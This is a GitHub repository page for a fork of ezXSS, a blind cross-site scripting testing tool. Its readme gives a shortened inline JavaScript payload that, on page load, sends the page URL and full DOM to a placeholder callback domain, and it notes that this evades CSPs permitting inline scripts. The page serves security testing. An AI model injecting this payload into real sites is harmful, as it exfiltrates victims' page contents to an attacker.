Skip to content
/ ezXSS Public
forked from ssl/ezXSS

ezXSS is an easy way to test (blind) XSS

License

MIT license
1 star 377 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

foobar7/ezXSS

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

160 Commits
files
files
 
 
license.txt
license.txt
 
 
readme.md
readme.md
 
 

Repository files navigation

Adding a quick check for the existence of parameters in callback.php of ezXSS (line 13-27) allows those parameters to be missing from log requests.

Now the plain JS code which doesn't need to retrieve a file can be shortened a bit:

<script>window.addEventListener('load',()=>{x={},a=document,x.uri=a.URL,x.dom=a.documentElement.outerHTML,t=new XMLHttpRequest,t.open('POST','https://[your-domain]/callback',1),t.send(JSON.stringify(x))})</script>

It's still pretty long, but better than before.

The benefit of this is that it's not caught by CSPs which allow inline scripts.

About

ezXSS is an easy way to test (blind) XSS

Resources

Readme

License

MIT license
Activity

Stars

1 star

Watchers

0 watching

Forks

0 forks
Report repository

Releases

11 tags

Packages

No packages published

Languages

  • HTML 47.8%
  • PHP 47.5%
  • JavaScript 4.7%